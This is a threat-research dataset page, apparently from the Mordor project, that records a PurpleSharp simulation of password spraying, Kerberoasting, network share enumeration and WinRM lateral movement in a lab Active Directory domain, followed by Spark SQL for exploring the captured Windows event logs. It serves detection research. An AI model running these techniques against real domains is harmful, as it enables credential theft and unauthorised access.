PurpleSharp Active Directory Playbook I¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g, Mauricio Velazco @mvelazco |
Creation Date |
2020/10/22 |
Modification Date |
2020/10/22 |
Tactics |
|
Techniques |
|
Tags |
None |
Dataset Description¶
This dataset represents threat actors performing a few techniques in Active Directory to brute force passwords, request Kerberos ticket-granting service (TGS) service tickets from all SPNs, test access to remote network shares, and move laterally over Windows Remote Management (WinRM).
Datasets Downloads¶
Dataset Type |
Link |
---|---|
Host |
|
Network |
Adversary View¶
c:\Users\pgustavo\Downloads>PurpleSharp.exe /t T1110.003,T1558.003,T1135,T1021.006
10/22/2020 04:29:52 [*] Starting T1110.003 Simulation on WORKSTATION5
10/22/2020 04:29:52 [*] Simulator running from c:\Users\pgustavo\Downloads\PurpleSharp.exe with PID:7520 as THESHIRE\pgustavo
10/22/2020 04:29:52 [*] Local Domain Brute Force using the LogonUser Win32 API function
[*] Targeting domain neighbor users
[*] Using LogonServer MORDORDC.theshire.local for LDAP queries
[*] Querying for active domain users with badPwdCount <= 3..
10/22/2020 04:29:53 [*] Obtained 7 user accounts
10/22/2020 04:29:53 [*] Tried to authenticate as lrodriguez (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as pgustavo (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as sysmonsvc (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as sbeavers (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as mscott (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as pbeesly (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as nxlogsvc (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Simulation Finished
10/22/2020 04:29:53 [*] Starting T1558.003 Simulation on WORKSTATION5
10/22/2020 04:29:53 [*] Simulator running from c:\Users\pgustavo\Downloads\PurpleSharp.exe with PID:7520 as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Sysmon/theshire.local (sysmonsvc)
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Nxlog/theshire.local (nxlogsvc)
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Defense/theshire.local (defensesvc)
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN OTR/theshire.local (otrsvc)
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Ring/theshire.local (mordorsvc)
10/22/2020 04:29:54 [*] Simulation Finished
10/22/2020 04:29:54 [*] Starting T1135 Simulation on WORKSTATION5
10/22/2020 04:29:54 [*] Simulator running from c:\Users\pgustavo\Downloads\PurpleSharp.exe with PID:7520 as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Using the Win32 API NetShareEnum function to execute this technique
[*] Obtaining domain neighbor targets ...
[*] Using MORDORDC.theshire.local for LDAP queries
10/22/2020 04:29:54 [*] Obtained 4 target computers
10/22/2020 04:29:54 [*] Successfully enumerated shares on WEC.theshire.local as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Successfully enumerated shares on WORKSTATION6.theshire.local as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Successfully enumerated shares on MORDORDC.theshire.local as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Successfully enumerated shares on WORKSTATION7.theshire.local as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Simulation Finished
10/22/2020 04:29:54 [*] Starting T1021.006 Simulation on WORKSTATION5
10/22/2020 04:29:54 [*] Simulator running from c:\Users\pgustavo\Downloads\PurpleSharp.exe with PID:7520 as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Using the System.Management.Automation .NET namespace to execute this technique
10/22/2020 04:29:54 [*] Querying LDAP for random targets...
[*] Obtaining domain neighbor targets ...
[*] Using MORDORDC.theshire.local for LDAP queries
10/22/2020 04:29:54 [*] Obtained 4 target computers
10/22/2020 04:29:59 [*] Started a process using WinRM on WORKSTATION7
10/22/2020 04:30:00 [*] Started a process using WinRM on WEC
10/22/2020 04:30:00 [*] Started a process using WinRM on WORKSTATION6
10/22/2020 04:30:01 [*] Started a process using WinRM on MORDORDC
10/22/2020 04:30:01 [*] Simulation Finished
10/22/2020 04:30:01 [*] Playbook Finished
c:\Users\pgustavo\Downloads>
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/purplesharp_ad_playbook_I.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |12 |15747|
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |1027 |
|WORKSTATION7.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |1025 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |13 |649 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |7 |532 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |422 |
|WORKSTATION7.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |414 |
|MORDORDC.theshire.local |Security |4658 |409 |
|MORDORDC.theshire.local |Microsoft-Windows-PowerShell/Operational|4103 |277 |
|MORDORDC.theshire.local |Windows PowerShell |800 |277 |
|WORKSTATION7.theshire.local|Microsoft-Windows-Sysmon/Operational |11 |212 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |212 |
|MORDORDC.theshire.local |Security |4656 |212 |
|WORKSTATION7.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |212 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |11 |210 |
|MORDORDC.theshire.local |Security |4690 |204 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |11 |203 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |169 |
|WORKSTATION6.theshire.local|Security |4658 |159 |
|WORKSTATION7.theshire.local|Security |4658 |159 |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows